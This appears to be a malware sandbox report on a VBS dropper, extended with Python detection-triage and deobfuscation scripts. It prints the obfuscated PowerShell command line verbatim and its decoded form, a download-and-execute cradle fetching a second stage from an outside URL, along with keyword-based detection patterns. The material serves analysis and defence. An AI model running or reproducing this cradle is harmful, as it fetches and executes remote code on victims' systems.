Analysis

  • max time kernel
    4294181s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20220311-en
  • submitted
    12-04-2022 18:38

General

  • Target

    AFKCVLKLDDLZAVUPDONGW.vbs

  • Size

    2KB

  • MD5

    24ad735b3a8d200c611b18b836acaf53

  • SHA1

    96bb5edf6154e46eb01a56a31b512790d293e367

  • SHA256

    bbcb131bea858c4fb62a325f5bc4788e3ca18e790c6dd698ee6c6e870ea45636

  • SHA512

    27b271bad8bed68d9a3b6ea986b7450f22a4c09831f4cb9a5588eada8246fa19695e82848a92087ba5564f6f3787d097dc91330df103deca64886f82bbbc7a65

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro. Here the parent is the script host itself (WScript.exe running the submitted .vbs), so the child powershell.exe is the dropper's intended behaviour rather than evidence of an exploited parent; the WScript.exe -> powershell.exe pair is still the most useful detection artefact in this report.

  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
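Triage logic for the signatures above, run over a few process-creation events: the parent/child check behind "Process spawned unexpected child process" plus structural markers of the command-line obfuscation seen in this sample. This is an added example, not part of the sandbox report; the EVENTS records are constructed to mirror the report's process tree and use Sysmon Event ID 1 field names (an assumption), and the thresholds are illustrative.

```python
"""Triage of process-creation events for the signatures above: a script host
(WScript.exe) spawning a shell, plus command-line obfuscation markers.  Added
example, not part of the sandbox report; EVENTS are constructed to mirror the
report's process tree, using Sysmon Event ID 1 field names (an assumption)."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}

# Structural obfuscation markers taken from the captured command line.  A plain
# keyword match for the download cradle is kept for contrast: it does NOT fire
# on this sample, because 'WebRequest' only exists after the .Replace() calls run.
INDICATORS = {
    "call operator on a string (.('...'))": re.compile(r"\.\(\s*'"),
    "format operator building a string ('{1}{0}' -f ...)": re.compile(r"'\{\d+\}[^']*'\s*-f\s*'", re.I),
    "Replace() stripping long junk": re.compile(r"\.Replace\(\s*'[^']{8,}'\s*,\s*'[^']{0,12}'\s*\)", re.I),
    "download cradle keyword": re.compile(r"WebRequest|WebClient|DownloadString|Invoke-WebRequest", re.I),
}

# Constructed events: [0] mirrors the report's WScript -> powershell launch with a
# shortened copy of its obfuscation style; [1] and [2] are benign controls.
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\WScript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell $A = 'Cr)4-$<1^%^=*^55-/_636[2TE'.Replace(')4-$<1^%^=*^55-/_636[2','Ea'); .('{1}{0}'-f'EX','I')($A)"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\Backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\WScript.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def script_host_spawned_shell(event):
    """The parent/child pair behind 'Process spawned unexpected child process'."""
    return basename(event["ParentImage"]) in SCRIPT_HOSTS and basename(event["Image"]) in SHELLS


def symbol_ratio(cmdline):
    """Share of characters that are neither alphanumeric nor whitespace, ignoring
    the executable name; junk padding pushes this far above normal admin usage."""
    parts = cmdline.split(None, 1)
    body = parts[1] if len(parts) > 1 else ""
    if not body:
        return 0.0
    return sum(1 for c in body if not (c.isalnum() or c.isspace())) / len(body)


def triage(event, density_threshold=0.35):
    """Return (verdict, reasons).  The parent/child pair alone is enough to alert;
    otherwise require two independent obfuscation markers to limit false positives."""
    reasons = []
    if script_host_spawned_shell(event):
        reasons.append(f"script host {basename(event['ParentImage'])} spawned {basename(event['Image'])}")
    cmdline = event.get("CommandLine", "")
    reasons += [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    if symbol_ratio(cmdline) > density_threshold:
        reasons.append(f"symbol density {symbol_ratio(cmdline):.2f} > {density_threshold}")
    verdict = "alert" if script_host_spawned_shell(event) or len(reasons) >= 2 else "ok"
    return verdict, reasons


if __name__ == "__main__":
    for ev in EVENTS:
        verdict, reasons = triage(ev)
        print(f"{verdict:5} {basename(ev['ParentImage'])} -> {basename(ev['Image'])}: {'; '.join(reasons) or 'no findings'}")
```

The first event alerts on the parent/child pair and on three structural markers, while the keyword cradle rule stays silent because the type name is only assembled at runtime; that is the reason to hunt on the call operator, the format operator and long `.Replace()` needles rather than on `WebRequest` or `DownloadString` strings. The two control events produce no findings.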

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AFKCVLKLDDLZAVUPDONGW.vbs"
    1⤵
      PID:596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $FTCKPRWRCANOIWXIDCVVNS = '[S\$3+0%!#70%*4{^]6\16]2EM.I@}%$%})<_{3+#![-&9^$##MREAdER]'.Replace('\$3+0%!#70%*4{^]6\16]2','ySt').Replace('@}%$%})<_{3+#![-&9^$##','O.StREA');$OPDAXIYFOCWNKVANDBYRRQ = ($FTCKPRWRCANOIWXIDCVVNS -Join '')| .('{1}{0}'-f'EX','I');$ICTZSOZQNDQVCJZDIABYPE = '[SyS93!=@^*/[*782[\$\-%={%T.W8(11[8<6/]5*868{9{#+06ST]'.Replace('93!=@^*/[*782[\$\-%={%','TEm.NE').Replace('8(11[8<6/]5*868{9{#+06','EbREquE');$IOGBGSTBSXHOWZHWGCXIVP = ($ICTZSOZQNDQVCJZDIABYPE -Join '')| .('{1}{0}'-f'EX','I');$BGWUTNDKYVDYGXTZZWXWNT = 'Cr)4-$<1^%^=*^55-/_636[2TE'.Replace(')4-$<1^%^=*^55-/_636[2','Ea');$OJLQEURWLWYVLQCIHYUUFD = 'GE5={{-]1==#)-+8=5%64%&}onSE'.Replace('5={{-]1==#)-+8=5%64%&}','tRESp');$SCYACXEAKXLAYHCTCLITJG = 'GE<-4[5]9+9}2/}{\7(9*!07REam'.Replace('<-4[5]9+9}2/}{\7(9*!07','tRESponSESt');$QSPTVKHFZAGSXGZPPOBDFP = 'RE262]_&$84<]*&!={=&-1%)nD'.Replace('262]_&$84<]*&!={=&-1%)','aDToE'); .('{1}{0}'-f'EX','I')($OPDAXIYFOCWNKVANDBYRRQ::new($IOGBGSTBSXHOWZHWGCXIVP::$BGWUTNDKYVDYGXTZZWXWNT('https://linkvilleplayers.org/wp-admin/Server.txt').$OJLQEURWLWYVLQCIHYUUFD().$SCYACXEAKXLAYHCTCLITJG()).$QSPTVKHFZAGSXGZPPOBDFP())
      1⤵
      • Process spawned unexpected child process
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1236
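The powershell.exe command line above hides every sensitive token in two ways: `('{1}{0}'-f'EX','I')` assembles `IEX` with the format operator and invokes it through the call operator `.(...)`, and each type or method name is padded with junk that `.Replace()` strips at runtime. Both tricks are fully resolvable without executing anything. The script below is an added example, not part of the sandbox report: `COMMAND_LINE` is copied verbatim from the process tree, and the unfolding rules are a hand-written emulation of just these two tricks (plus inlining of the throw-away variables), not a general PowerShell evaluator.

```python
"""Static deobfuscation of the powershell.exe command line from the process
tree above.  Added example, not part of the sandbox report: COMMAND_LINE is
copied from the report; the unfolding rules emulate only the two tricks this
sample uses and are not a general PowerShell evaluator."""
import re

# Exact command line captured by the sandbox (copied from the Processes section).
COMMAND_LINE = r"""powershell $FTCKPRWRCANOIWXIDCVVNS = '[S\$3+0%!#70%*4{^]6\16]2EM.I@}%$%})<_{3+#![-&9^$##MREAdER]'.Replace('\$3+0%!#70%*4{^]6\16]2','ySt').Replace('@}%$%})<_{3+#![-&9^$##','O.StREA');$OPDAXIYFOCWNKVANDBYRRQ = ($FTCKPRWRCANOIWXIDCVVNS -Join '')| .('{1}{0}'-f'EX','I');$ICTZSOZQNDQVCJZDIABYPE = '[SyS93!=@^*/[*782[\$\-%={%T.W8(11[8<6/]5*868{9{#+06ST]'.Replace('93!=@^*/[*782[\$\-%={%','TEm.NE').Replace('8(11[8<6/]5*868{9{#+06','EbREquE');$IOGBGSTBSXHOWZHWGCXIVP = ($ICTZSOZQNDQVCJZDIABYPE -Join '')| .('{1}{0}'-f'EX','I');$BGWUTNDKYVDYGXTZZWXWNT = 'Cr)4-$<1^%^=*^55-/_636[2TE'.Replace(')4-$<1^%^=*^55-/_636[2','Ea');$OJLQEURWLWYVLQCIHYUUFD = 'GE5={{-]1==#)-+8=5%64%&}onSE'.Replace('5={{-]1==#)-+8=5%64%&}','tRESp');$SCYACXEAKXLAYHCTCLITJG = 'GE<-4[5]9+9}2/}{\7(9*!07REam'.Replace('<-4[5]9+9}2/}{\7(9*!07','tRESponSESt');$QSPTVKHFZAGSXGZPPOBDFP = 'RE262]_&$84<]*&!={=&-1%)nD'.Replace('262]_&$84<]*&!={=&-1%)','aDToE'); .('{1}{0}'-f'EX','I')($OPDAXIYFOCWNKVANDBYRRQ::new($IOGBGSTBSXHOWZHWGCXIVP::$BGWUTNDKYVDYGXTZZWXWNT('https://linkvilleplayers.org/wp-admin/Server.txt').$OJLQEURWLWYVLQCIHYUUFD().$SCYACXEAKXLAYHCTCLITJG()).$QSPTVKHFZAGSXGZPPOBDFP())"""

# Trick 1: ('{1}{0}' -f 'EX','I') assembles "IEX" with the format operator and
# .('IEX') invokes it via the call operator, so the token never appears literally.
FMT_RE = re.compile(r"\('([^']*)'\s*-f\s*('[^']*'(?:\s*,\s*'[^']*')*)\)")
CALL_RE = re.compile(r"\.\('([^'()]+)'\)")
# Trick 2: every real name is padded with junk that .Replace() strips at runtime.
REPLACE_RE = re.compile(r"'([^']*)'\.Replace\('([^']*)'\s*,\s*'([^']*)'\)", re.IGNORECASE)
ASSIGN_RE = re.compile(r"^\$(\w+)\s*=\s*(.+)$")
PIPE_IEX_RE = re.compile(r"^\(\s*\$(\w+)\s+-Join\s+''\s*\)\s*\|\s*IEX$", re.IGNORECASE)


def resolve_format_operator(script):
    """Evaluate 'fmt' -f 'a','b' (only {n} placeholders, which str.format shares)
    and collapse the call-operator form .('Name') to Name."""
    def _fmt(m):
        args = re.findall(r"'([^']*)'", m.group(2))
        return "('" + m.group(1).format(*args) + "')"
    return CALL_RE.sub(r"\1", FMT_RE.sub(_fmt, script))


def resolve_replace_chains(script):
    """Fold 'literal'.Replace(junk, real) into the resulting literal, leftmost
    call first, until no .Replace() on a string literal remains."""
    def _fold(m):
        return "'" + m.group(1).replace(m.group(2), m.group(3)) + "'"
    while True:
        folded = REPLACE_RE.sub(_fold, script, count=1)
        if folded == script:
            return script
        script = folded


def resolve_variables(script):
    """Inline the throw-away variables into the final statement.  Assumes one
    statement per ';' and no ';' inside string literals (true for this sample)."""
    script = re.sub(r"^\s*powershell(?:\.exe)?\s+", "", script, flags=re.IGNORECASE)
    values, body = {}, []
    for stmt in (s.strip() for s in script.split(";") if s.strip()):
        m = ASSIGN_RE.match(stmt)
        if not m:
            body.append(stmt)
            continue
        name, rhs = m.group(1), m.group(2).strip()
        pipe = PIPE_IEX_RE.match(rhs)
        if pipe:                                     # ($x -Join '') | IEX  ->  value of $x
            values[name] = values.get(pipe.group(1), rhs)
        elif len(rhs) >= 2 and rhs[0] == rhs[-1] == "'":
            values[name] = rhs[1:-1]
        else:
            values[name] = rhs                       # unknown shape: keep it symbolic
    inline = lambda m: values.get(m.group(1), m.group(0))
    return ";".join(re.sub(r"\$(\w+)", inline, stmt) for stmt in body)


def deobfuscate(command_line):
    return resolve_variables(resolve_replace_chains(resolve_format_operator(command_line)))


def extract_urls(text):
    """Pull the C2/download URL(s) out of the decoded script for blocking."""
    return re.findall(r"https?://[^\s'\")]+", text)


if __name__ == "__main__":
    decoded = deobfuscate(COMMAND_LINE)
    print(decoded)
    print("download URL(s):", extract_urls(decoded))
```

The decoded statement is `IEX([System.IO.StreamReader]::new([System.Net.WebRequest]::Create('https://linkvilleplayers.org/wp-admin/Server.txt').GetResponse().GetResponseStream()).ReadToEnd())` (PowerShell is case-insensitive, so the mixed case the script leaves behind, such as `GEtRESponSE`, is irrelevant): a plain download-and-execute cradle that fetches a second stage from the listed URL and runs it in memory, which is why no payload file appears among the downloads below.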

    Network

    MITRE ATT&CK Matrix


    Downloads

    All seven dumps are memory regions of PID 1236 (powershell.exe); each Filesize matches the end minus the start address of its range.

    • memory/1236-54-0x000007FEFB901000-0x000007FEFB903000-memory.dmp (Filesize 8KB)
    • memory/1236-55-0x0000000002830000-0x0000000002832000-memory.dmp (Filesize 8KB)
    • memory/1236-57-0x0000000002834000-0x0000000002837000-memory.dmp (Filesize 12KB)
    • memory/1236-58-0x0000000002832000-0x0000000002834000-memory.dmp (Filesize 8KB)
    • memory/1236-56-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp (Filesize 11.4MB)
    • memory/1236-59-0x000000001B860000-0x000000001BB5F000-memory.dmp (Filesize 3.0MB)
    • memory/1236-60-0x000000000283B000-0x000000000285A000-memory.dmp (Filesize 124KB)